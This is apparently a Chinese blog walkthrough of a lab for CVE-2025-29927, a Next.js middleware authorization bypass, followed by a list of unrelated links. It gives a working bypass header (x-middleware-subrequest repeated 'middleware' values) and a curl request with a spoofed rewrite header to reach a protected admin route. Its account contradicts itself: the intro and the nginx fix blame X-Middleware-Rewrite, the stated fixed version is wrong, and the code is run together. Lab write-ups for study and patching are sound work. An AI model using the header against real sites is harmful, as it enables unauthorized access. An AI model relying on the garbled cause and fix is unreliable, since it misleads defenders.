当前位置: 首页 > news >正文

Next.js 中间件鉴权绕过漏洞 CVE-2025-29927

前言:CVE-2025-29927 是一个影响 Next.js 的严重漏洞,源于开发者信任了客户端请求中携带的 X-Middleware-Rewrite 头部字段。攻击者可以手动构造该头部,实现绕过中间件逻辑,访问本应受保护的资源或 API。

影响版本:Next.js < 14.1.4
成因概括:攻击者利用请求头控制中间件行为,重写跳转目标路径,进而绕过路由拦截。

任务一 启动环境

cd next.js/
cd CVE-2025-29927/
docker compose up -d
//3000就是靶机端口

 

 任务二 打开BurpSuite

代理->代理设置->响应拦截规则(勾选)

随便输入一个弱口令 返回的是/login 没有成功

x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
//在bp加入一个头部,返回了200成功了

任务三 拓展 | 本地 

import { NextResponse } from 'next/server';
import type { NextRequest } from 'next/server';export function middleware(request: NextRequest) {const token = request.cookies.get('token');if (!token) {return NextResponse.redirect(new URL('/login', request.url));}return NextResponse.next();
}//创建中间件 middleware.ts
curl -i http://localhost:3000/api/admin \-H "X-Middleware-Rewrite: /api/public" \-H "Cookie: token=malicious"
//构造绕过请求,模拟攻击
//原本未登录用户访问 /api/admin 会被跳转到 /login,构造该头部后,成功伪装访问 /api/public,绕过登录校验。

任务四 修复 

//防御措施
proxy_set_header X-Middleware-Rewrite "";
//中间件中加入请求来源验证机制,防止伪造

官方修复版本:14.1.4
GitHub Release Note 

相关文章:

  • 【前端】掌握HTML/CSS宽高调整:抓住问题根源,掌握黄金法则
  • Python 网络编程 -- WebSocket编程
  • 从零开始的云计算——番外实战,iptables防火墙项目
  • 压敏电阻的选型都要考虑哪些因素?同时注意事项都有哪些?
  • python执行测试用例,allure报乱码且未成功生成报告
  • 时序数据库IoTDB的UDF Sample算法在数据监控、故障预防的应用
  • Python html 库用法详解
  • 01 Deep learning神经网络的编程基础 二分类--吴恩达
  • Apollo Auto:Cyber RT 与 ROS 通信
  • 面试心得 --- 车载诊断测试常见的一些面试问题
  • LMT86LP模拟温度传感器
  • Mobile App UI自动化locator
  • 【websocket】安装与使用
  • Simplicity studio SDK下载和安装,创建工程
  • 《如何使用MinGW-w64编译OpenCV和opencv_contrib》
  • 如何通过外网访问内网?哪个方案比较好用?跨网远程连接网络知识早知道
  • 开关机、重启、改密、登录:图解腾讯云CVM日常管理核心操作,轻松掌控你的云主机
  • linux 故障处置通用流程-36计-14-27
  • 【计算机网络】NAT、代理服务器、内网穿透、内网打洞、局域网中交换机
  • centos实现SSH远程登录
  • 一家专门做代购的网站/百度推广登录入口下载
  • 承德的网站建设公司/cpa推广联盟平台
  • 网站建设北京/谷歌搜索引擎网页版入口
  • 广东快速做网站公司哪家好/windows优化大师卸载
  • 国内真正的永久建站/怎么制作公司网页
  • 前程无忧怎么做网站/九江seo优化